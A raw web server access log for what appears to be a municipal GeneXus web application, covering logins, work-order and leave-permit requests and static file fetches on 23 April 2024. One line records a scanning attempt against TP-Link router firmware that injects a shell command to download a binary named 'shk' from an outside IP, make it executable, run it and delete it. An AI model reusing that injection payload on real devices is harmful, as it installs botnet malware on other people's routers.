190.95.15.15 - - [23/Apr/2024:18:09:55 -0300] "POST /cormun/servlet/trsolicitudot?64eaac908d6f650e09f97acd2b9b3a90,gx-no-cache=1713906371896 HTTP/1.1" 200 4337
190.95.15.15 - - [23/Apr/2024:18:09:55 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.95.15.15 - - [23/Apr/2024:18:09:55 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.95.15.15 - - [23/Apr/2024:18:09:55 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.95.15.15 - - [23/Apr/2024:18:09:55 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.95.15.15 - - [23/Apr/2024:18:09:56 -0300] "POST /cormun/servlet/trsolicitudot?64eaac908d6f650e09f97acd2b9b3a90,gx-no-cache=1713906372009 HTTP/1.1" 200 4073
190.95.15.15 - - [23/Apr/2024:18:10:05 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1736
190.171.152.234 - - [23/Apr/2024:18:10:10 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1713902770692 HTTP/1.1" 200 83
181.212.47.137 - - [23/Apr/2024:18:10:10 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21311,, HTTP/1.1" 200 8414
181.212.47.137 - - [23/Apr/2024:18:10:10 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
181.212.47.137 - - [23/Apr/2024:18:10:12 -0300] "POST /cormun/servlet/vesolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,2024,21311,,,gx-no-cache=1713906386519 HTTP/1.1" 200 12310
181.212.47.137 - - [23/Apr/2024:18:10:12 -0300] "POST /cormun/servlet/vesolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,2024,21311,,,gx-no-cache=1713906386665 HTTP/1.1" 200 12244
190.95.15.15 - - [23/Apr/2024:18:10:13 -0300] "POST /cormun/servlet/hlogin?64eaac908d6f650e09f97acd2b9b3a90,gx-no-cache=1713906389243 HTTP/1.1" 200 90
190.95.15.15 - - [23/Apr/2024:18:10:13 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.95.15.15 - - [23/Apr/2024:18:10:13 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4225
190.95.15.15 - - [23/Apr/2024:18:10:13 -0300] "GET /cormun/static/SmoothNavMenu/resources/images/right.gif HTTP/1.1" 200 860
181.212.47.137 - - [23/Apr/2024:18:10:15 -0300] "GET /cormun/servlet/trautorizarot? HTTP/1.1" 200 10007
190.95.15.15 - - [23/Apr/2024:18:10:15 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 8762
190.95.15.15 - - [23/Apr/2024:18:10:15 -0300] "GET /cormun/static/gxcfg.js?202211298474254 HTTP/1.1" 200 953
190.95.15.15 - - [23/Apr/2024:18:10:15 -0300] "GET /cormun/static/trautorizarsolicitud.js?202211298474588 HTTP/1.1" 200 53909
190.171.152.234 - - [23/Apr/2024:18:10:18 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
181.212.47.137 - - [23/Apr/2024:18:10:18 -0300] "POST /cormun/servlet/trautorizarot?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713906392731 HTTP/1.1" 200 5351
181.212.47.137 - - [23/Apr/2024:18:10:20 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 28535
190.95.15.15 - - [23/Apr/2024:18:10:22 -0300] "POST /cormun/servlet/trautorizarsolicitud?64eaac908d6f650e09f97acd2b9b3a90,,gx-no-cache=1713906398526 HTTP/1.1" 200 4802
190.95.15.15 - - [23/Apr/2024:18:10:22 -0300] "POST /cormun/servlet/trautorizarsolicitud?64eaac908d6f650e09f97acd2b9b3a90,,gx-no-cache=1713906398624 HTTP/1.1" 200 4536
181.212.47.137 - - [23/Apr/2024:18:10:23 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713906398038 HTTP/1.1" 200 9029
181.212.47.137 - - [23/Apr/2024:18:10:36 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21314,, HTTP/1.1" 200 8393
181.212.47.137 - - [23/Apr/2024:18:10:36 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
190.171.152.234 - - [23/Apr/2024:18:11:05 -0300] "GET /cormun/servlet/solicitudot?f95194babdb4086eafaafce2d75c46a2f9e15d06094e9f3be7b6e08c6ff4252fdb66e8f164adc00eb07358f36f7ebc79,gx-no-cache=1713902825280 HTTP/1.1" 200 30
190.171.152.234 - - [23/Apr/2024:18:11:05 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1713902825311 HTTP/1.1" 200 33
190.171.152.234 - - [23/Apr/2024:18:11:05 -0300] "POST /cormun/servlet/solicitudot?b4ff18e462a07c9c333f67db3b417de9,INS,0,0,false,,gx-no-cache=1713902825363 HTTP/1.1" 200 93
190.171.152.234 - - [23/Apr/2024:18:11:05 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1015
190.171.152.234 - - [23/Apr/2024:18:11:05 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 18212
190.95.15.15 - - [23/Apr/2024:18:12:32 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1741
190.95.15.15 - - [23/Apr/2024:18:12:39 -0300] "POST /cormun/servlet/hlogin?64eaac908d6f650e09f97acd2b9b3a90,gx-no-cache=1713906535538 HTTP/1.1" 200 90
190.95.15.15 - - [23/Apr/2024:18:12:39 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.95.15.15 - - [23/Apr/2024:18:12:39 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3975
190.95.15.15 - - [23/Apr/2024:18:12:42 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 12221
190.171.152.234 - - [23/Apr/2024:18:14:32 -0300] "POST /cormun/servlet/trsolicitudot?b4ff18e462a07c9c333f67db3b417de9,gx-no-cache=1713903032695 HTTP/1.1" 200 15538
190.171.152.234 - - [23/Apr/2024:18:14:32 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.152.234 - - [23/Apr/2024:18:14:33 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.152.234 - - [23/Apr/2024:18:14:33 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.152.234 - - [23/Apr/2024:18:14:33 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.152.234 - - [23/Apr/2024:18:14:33 -0300] "POST /cormun/servlet/trsolicitudot?b4ff18e462a07c9c333f67db3b417de9,gx-no-cache=1713903033287 HTTP/1.1" 200 15477
190.171.152.234 - - [23/Apr/2024:18:14:35 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 8815
190.171.152.234 - - [23/Apr/2024:18:14:39 -0300] "POST /cormun/servlet/trautorizarsolicitud?b4ff18e462a07c9c333f67db3b417de9,,gx-no-cache=1713903040106 HTTP/1.1" 200 4813
190.171.152.234 - - [23/Apr/2024:18:14:40 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.152.234 - - [23/Apr/2024:18:14:40 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.152.234 - - [23/Apr/2024:18:14:40 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.152.234 - - [23/Apr/2024:18:14:40 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.152.234 - - [23/Apr/2024:18:14:40 -0300] "POST /cormun/servlet/trautorizarsolicitud?b4ff18e462a07c9c333f67db3b417de9,,gx-no-cache=1713903040220 HTTP/1.1" 200 4559
190.171.142.18 - - [23/Apr/2024:18:16:25 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1722
181.212.47.137 - - [23/Apr/2024:18:16:28 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 11237
190.171.142.18 - - [23/Apr/2024:18:16:31 -0300] "POST /cormun/servlet/hlogin?6e2350b9cd63fac6d7d4e7a372a9bc50,gx-no-cache=1713907602156 HTTP/1.1" 200 90
190.171.142.18 - - [23/Apr/2024:18:16:31 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.142.18 - - [23/Apr/2024:18:16:32 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4381
190.171.142.18 - - [23/Apr/2024:18:16:38 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10604
190.171.142.42 - - [23/Apr/2024:18:17:42 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1748
181.212.47.137 - - [23/Apr/2024:18:18:09 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713906863266 HTTP/1.1" 200 26243
190.171.141.138 - - [23/Apr/2024:18:18:23 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6051
190.171.141.138 - - [23/Apr/2024:18:18:23 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1741
181.212.47.137 - - [23/Apr/2024:18:19:03 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21312,, HTTP/1.1" 200 8399
181.212.47.137 - - [23/Apr/2024:18:19:03 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
181.212.47.137 - - [23/Apr/2024:18:19:04 -0300] "POST /cormun/servlet/vesolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,2024,21312,,,gx-no-cache=1713906918809 HTTP/1.1" 200 12299
181.212.47.137 - - [23/Apr/2024:18:19:04 -0300] "POST /cormun/servlet/vesolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,2024,21312,,,gx-no-cache=1713906918986 HTTP/1.1" 200 12232
181.212.47.137 - - [23/Apr/2024:18:19:07 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 28654
190.171.142.42 - - [23/Apr/2024:18:20:05 -0300] "POST /cormun/servlet/hlogin?6893d0bdb192458285eaa7fd0a23d74c,gx-no-cache=1713906980892 HTTP/1.1" 200 90
190.171.142.42 - - [23/Apr/2024:18:20:05 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 967
190.171.142.42 - - [23/Apr/2024:18:20:08 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 15875
190.171.142.42 - - [23/Apr/2024:18:23:03 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1713907157632 HTTP/1.1" 200 4031
190.171.142.42 - - [23/Apr/2024:18:23:03 -0300] "POST /cormun/servlet/solicitudot?6893d0bdb192458285eaa7fd0a23d74c,INS,0,0,false,,gx-no-cache=1713907159211 HTTP/1.1" 200 12607
190.171.142.42 - - [23/Apr/2024:18:23:06 -0300] "GET /cormun/servlet/solicitudot?27ce2c6b1f7481975c8faa43a7a63cd00590ce1968ff1d18c6f307de48c8f79394e5ead6a38c25940c8bf59d83445866,gx-no-cache=1713907162069 HTTP/1.1" 200 30
181.212.47.137 - - [23/Apr/2024:18:25:29 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713907303628 HTTP/1.1" 200 26260
190.171.142.42 - - [23/Apr/2024:18:26:47 -0300] "GET /cormun/servlet/solicitudot?27ce2c6b1f7481975c8faa43a7a63cd0fa23d5690a159baaf100328d050595a9b4538f62e5acbf45bd9fa7574f485568f6ace6083394a97caa6c851c66f94222,gx-no-cache=1713907382950 HTTP/1.1" 200 30
190.171.142.42 - - [23/Apr/2024:18:26:47 -0300] "GET /cormun/servlet/solicitudot?27ce2c6b1f7481975c8faa43a7a63cd0825dcd8634057abfafb7f6aab1102c78,gx-no-cache=1713907382988 HTTP/1.1" 200 29
190.171.142.42 - - [23/Apr/2024:18:28:57 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1713907509480 HTTP/1.1" 200 297
190.171.142.42 - - [23/Apr/2024:18:28:58 -0300] "GET /cormun/servlet/solicitudot?27ce2c6b1f7481975c8faa43a7a63cd07a948924611f46271f3820d42b7a717457e63ed8169c0ee2a56fa553f16f5081655a57abfd1b860cd7b91205e32ad855296269b434b59871224cb3069c7cf7e8b0563b87fac4faa318c7b67e1822d46c443cd6b0de6bdedacc7c1e30b4ed0bcd2482881c953a1991684185f5d23a60fe3f17b6c6079b8f651af8072c99eec46f2882a7afc8c7dbb05055c1d27f9a483a2cbd6ed3e2812f87b0ba5c747639334957adc45c31d199f05ea17a41ff0fe27d2aa26ce73552b8bd3a62283233a6c46fbcd19b068f6f39778204feb86032f3f1f51f2b9cd1a0eefe79506be460b8c06675d553f28b0447fce3cdcfe07db89d97b2d3f82cf4155c451e83b6283875a4777251d35b2354849639596bbd5d55d078a36d1a3ad3c0b8d87a3430217436f2e724f7c7f69072d3af12722c44c9c6eeaff87144e8d6613ba9dcb491346df6098985cb53bf344e9d1d2c73fe6b823f67c8d006c10811ba52f710e7de36edf74f64779d9a35ffda7da2222c25597aba8df69c46d28d5ceb7447f0bee4a373a76f54,gx-no-cache=1713907513767 HTTP/1.1" 200 30
190.171.142.42 - - [23/Apr/2024:18:29:01 -0300] "GET /cormun/servlet/solicitudot?27ce2c6b1f7481975c8faa43a7a63cd07a948924611f46271f3820d42b7a717457e63ed8169c0ee2a56fa553f16f5081655a57abfd1b860cd7b91205e32ad855296269b434b59871224cb3069c7cf7e8b0563b87fac4faa318c7b67e1822d46c443cd6b0de6bdedacc7c1e30b4ed0bcd2482881c953a1991684185f5d23a60fe3f17b6c6079b8f651af8072c99eec46f2882a7afc8c7dbb05055c1d27f9a483a2cbd6ed3e2812f87b0ba5c747639334957adc45c31d199f05ea17a41ff0fe27d2aa26ce73552b8bd3a62283233a6c46fbcd19b068f6f39778204feb86032f3f1f51f2b9cd1a0eefe79506be460b8c0663cbbaba223d2beb6a3990487c88ef5dcb2d3f82cf4155c451e83b6283875a4777251d35b2354849639596bbd5d55d078a36d1a3ad3c0b8d87a3430217436f2e724f7c7f69072d3af12722c44c9c6eeaff87144e8d6613ba9dcb491346df6098985cb53bf344e9d1d2c73fe6b823f67c8d006c10811ba52f710e7de36edf74f64781bb31130833b0f33c4fb69559fdaec9c46d28d5ceb7447f0bee4a373a76f54,gx-no-cache=1713907517329 HTTP/1.1" 200 30
190.171.142.42 - - [23/Apr/2024:18:29:20 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1713907536232 HTTP/1.1" 200 30
190.171.142.42 - - [23/Apr/2024:18:33:03 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1722
190.171.142.42 - - [23/Apr/2024:18:33:16 -0300] "POST /cormun/servlet/hlogin?6893d0bdb192458285eaa7fd0a23d74c,gx-no-cache=1713907772300 HTTP/1.1" 200 90
190.171.142.42 - - [23/Apr/2024:18:33:16 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 967
190.171.142.42 - - [23/Apr/2024:18:33:16 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 15875
190.171.142.42 - - [23/Apr/2024:18:33:21 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 14330
179.43.190.218 - - [23/Apr/2024:18:34:29 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Fbin%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 1013
190.171.142.42 - - [23/Apr/2024:18:37:38 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1713908033835 HTTP/1.1" 200 1482
190.171.142.42 - - [23/Apr/2024:18:37:40 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.142.42 - - [23/Apr/2024:18:37:45 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1713908041444 HTTP/1.1" 200 41
190.171.142.42 - - [23/Apr/2024:18:38:58 -0300] "GET /cormun/servlet/solicitudot?27ce2c6b1f7481975c8faa43a7a63cd097b53c887e3a9f2ea94ef11e661b56ae9ec18ebfd914b743325b1b4cc1bd92be7852d627b968756fe01effd25f57f228cbd6c23dd61f4a4371390c8a704b0aa93ce3bf4e8c9a8edf415ad814ddf4477bcef045002d99f60f866e15e3ed54413d,gx-no-cache=1713908112919 HTTP/1.1" 200 110
190.171.142.42 - - [23/Apr/2024:18:38:58 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1713908114410 HTTP/1.1" 200 110
190.171.142.42 - - [23/Apr/2024:18:39:03 -0300] "GET /cormun/servlet/solicitudot?27ce2c6b1f7481975c8faa43a7a63cd09c58614d5da77e580eb806f7556a05a5fe3272f0be79f3fddf0b746edaec6788602d53e096daf5914b42f685fb6021400741218e7449b59f9f96b8555c907fbdb926bdc4c92b6b2ef8e42f61b2b67346412777aeebcfda12c4baa924d0e72bf2,gx-no-cache=1713908119061 HTTP/1.1" 200 29
190.171.142.42 - - [23/Apr/2024:18:40:26 -0300] "GET /cormun/servlet/solicitudot?27ce2c6b1f7481975c8faa43a7a63cd072ff1f68064695c212875e34521436c9e4994ed4baf7d3ee4f40694c0f98a586,gx-no-cache=1713908201997 HTTP/1.1" 200 134
190.171.142.42 - - [23/Apr/2024:18:40:26 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
190.171.142.42 - - [23/Apr/2024:18:40:26 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.142.42 - - [23/Apr/2024:18:40:26 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
190.171.142.42 - - [23/Apr/2024:18:40:26 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.142.42 - - [23/Apr/2024:18:40:26 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1713908202044 HTTP/1.1" 200 34
190.171.142.42 - - [23/Apr/2024:18:40:43 -0300] "GET /cormun/servlet/solicitudot?27ce2c6b1f7481975c8faa43a7a63cd0d41ea408beb38fe16ae06f25a87f764d6b7b0f0b413c72baa37db537538b5013,gx-no-cache=1713908219054 HTTP/1.1" 200 30
190.171.142.42 - - [23/Apr/2024:18:40:43 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1713908219075 HTTP/1.1" 200 34
190.171.142.42 - - [23/Apr/2024:18:41:13 -0300] "POST /cormun/servlet/solicitudot?6893d0bdb192458285eaa7fd0a23d74c,INS,0,0,false,,gx-no-cache=1713908248935 HTTP/1.1" 200 93
190.171.142.42 - - [23/Apr/2024:18:41:13 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1012
190.171.142.42 - - [23/Apr/2024:18:41:16 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 15878
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 6319
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/gxui/gxui-all.css?120300 HTTP/1.1" 200 2179
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/calendar-system.css?85620 HTTP/1.1" 200 5572
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/gxcfg.js?20221129846531 HTTP/1.1" 200 953
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/calendar-setup.js?85251 HTTP/1.1" 200 2588
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/calendar-es.js?85251 HTTP/1.1" 200 1901
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/calendar.js?85251 HTTP/1.1" 200 26246
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/Resources/PXTools/calendar.png HTTP/1.1" 200 1306
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/gxdec.js?85251 HTTP/1.1" 200 19579
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/trsolicitudot.js?202211298465651 HTTP/1.1" 200 54040
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/Resources/PXToolsDataSearch.png HTTP/1.1" 200 435
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/Resources/PXToolsGridFirstDisabled.gif HTTP/1.1" 200 100
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/Shared/ext/resources/css/ext-all.css?215870 HTTP/1.1" 200 416045
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/Resources/PXToolsGridPreviousDisabled.gif HTTP/1.1" 200 90
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/Resources/PXToolsGridLastDisabled.gif HTTP/1.1" 200 98
190.171.152.138 - - [23/Apr/2024:18:42:07 -0300] "GET /cormun/static/Resources/PXToolsGridNextDisabled.gif HTTP/1.1" 200 90
190.171.152.138 - - [23/Apr/2024:18:42:08 -0300] "GET /cormun/static/Resources/PXToolsGridPage.gif HTTP/1.1" 200 725
190.171.152.138 - - [23/Apr/2024:18:42:08 -0300] "GET /cormun/static/Resources/PXToolsAddAllAction.png HTTP/1.1" 200 495
190.171.152.138 - - [23/Apr/2024:18:42:08 -0300] "GET /cormun/static/Resources/PXToolsActionExcel.png HTTP/1.1" 200 727
190.171.152.138 - - [23/Apr/2024:18:42:08 -0300] "GET /cormun/static/Resources/asc.gif HTTP/1.1" 200 67
190.171.152.138 - - [23/Apr/2024:18:42:08 -0300] "GET /cormun/static/Resources/desc.gif HTTP/1.1" 200 65
190.171.152.138 - - [23/Apr/2024:18:42:08 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1734
190.171.152.138 - - [23/Apr/2024:18:42:08 -0300] "GET /cormun/static/Shared/ext/resources/themes/images/default/panel/bg-headersPanel.png HTTP/1.1" 200 255
190.171.152.138 - - [23/Apr/2024:18:42:08 -0300] "GET /cormun/static/Shared/ext/resources/themes/images/default/tools/tool-sprites.gif HTTP/1.1" 200 5434
190.171.152.138 - - [23/Apr/2024:18:43:36 -0300] "POST /cormun/servlet/hlogin?a18d29db5efccf5b244e1d610d736247,gx-no-cache=1713908391856 HTTP/1.1" 200 90
190.171.152.138 - - [23/Apr/2024:18:43:36 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.152.138 - - [23/Apr/2024:18:43:36 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 7268
181.212.47.137 - - [23/Apr/2024:18:45:28 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1714
181.212.47.137 - - [23/Apr/2024:18:45:34 -0300] "POST /cormun/servlet/hlogin?70090d4cc34ce18d7f8304780beb5e3b,gx-no-cache=1713908508592 HTTP/1.1" 200 90
181.212.47.137 - - [23/Apr/2024:18:45:34 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 954
181.212.47.137 - - [23/Apr/2024:18:45:34 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 28652
181.212.47.137 - - [23/Apr/2024:18:45:45 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908519572 HTTP/1.1" 200 5247
181.212.47.137 - - [23/Apr/2024:18:45:58 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908532664 HTTP/1.1" 200 5246
181.212.47.137 - - [23/Apr/2024:18:45:59 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908533471 HTTP/1.1" 200 5246
181.212.47.137 - - [23/Apr/2024:18:46:09 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908544256 HTTP/1.1" 200 5248
181.212.47.137 - - [23/Apr/2024:18:46:10 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908544783 HTTP/1.1" 200 5248
190.171.144.234 - - [23/Apr/2024:18:46:13 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
190.171.144.234 - - [23/Apr/2024:18:46:20 -0300] "POST /cormun/servlet/hlogin?74a65c9e6e93a0f9d92d8af527e96bf8,gx-no-cache=1713908555235 HTTP/1.1" 200 90
190.171.144.234 - - [23/Apr/2024:18:46:20 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.144.234 - - [23/Apr/2024:18:46:21 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3990
181.212.47.137 - - [23/Apr/2024:18:46:24 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908558503 HTTP/1.1" 200 5250
190.171.144.234 - - [23/Apr/2024:18:46:24 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 10950
181.212.47.137 - - [23/Apr/2024:18:46:24 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908559071 HTTP/1.1" 200 5250
181.212.47.137 - - [23/Apr/2024:18:46:24 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908559222 HTTP/1.1" 200 5251
181.212.47.137 - - [23/Apr/2024:18:46:29 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
181.212.47.137 - - [23/Apr/2024:18:46:34 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908569216 HTTP/1.1" 200 5251
181.212.47.137 - - [23/Apr/2024:18:46:35 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908569766 HTTP/1.1" 200 5251
190.171.144.234 - - [23/Apr/2024:18:46:41 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6853
181.212.47.137 - - [23/Apr/2024:18:46:49 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908583448 HTTP/1.1" 200 6626
181.212.47.137 - - [23/Apr/2024:18:46:49 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908583791 HTTP/1.1" 200 6626
190.171.144.234 - - [23/Apr/2024:18:46:50 -0300] "GET /cormun/servlet/permisogoce?a448e203cf692e138b3ae0f6a239fb86818bad7ab0c490d6903dcb289f8f6735c553239cede89a36a135d84077104783ab4401b36f8a5e31563b2d8192d266f0,gx-no-cache=1713908585618 HTTP/1.1" 200 80
190.171.144.234 - - [23/Apr/2024:18:46:50 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.144.234 - - [23/Apr/2024:18:46:59 -0300] "GET /cormun/servlet/permisogoce?a448e203cf692e138b3ae0f6a239fb8616b66b696000059f52f7f7a606f438819c16aae0bf20c02aa557dcad2e0a8a473b24035d7befa65a08111654d29a489e,gx-no-cache=1713908594760 HTTP/1.1" 200 47
190.171.144.234 - - [23/Apr/2024:18:47:06 -0300] "POST /cormun/servlet/permisogoce?74a65c9e6e93a0f9d92d8af527e96bf8,INS,0,,,,gx-no-cache=1713908598889 HTTP/1.1" 200 93
190.171.144.234 - - [23/Apr/2024:18:47:06 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1010
190.171.144.234 - - [23/Apr/2024:18:47:06 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 11143
190.171.144.234 - - [23/Apr/2024:18:47:09 -0300] "GET /cormun/servlet/apermisogoceprn?12692670,P,20240423174256,PU HTTP/1.1" 200 1652
181.212.47.137 - - [23/Apr/2024:18:47:20 -0300] "POST /cormun/servlet/trsolicitudgral?70090d4cc34ce18d7f8304780beb5e3b,,gx-no-cache=1713908614304 HTTP/1.1" 200 26256
190.171.142.42 - - [23/Apr/2024:18:48:12 -0300] "POST /cormun/servlet/solicitudot?6893d0bdb192458285eaa7fd0a23d74c,INS,0,0,false,,gx-no-cache=1713908664213 HTTP/1.1" 200 12892
190.171.142.42 - - [23/Apr/2024:18:48:12 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
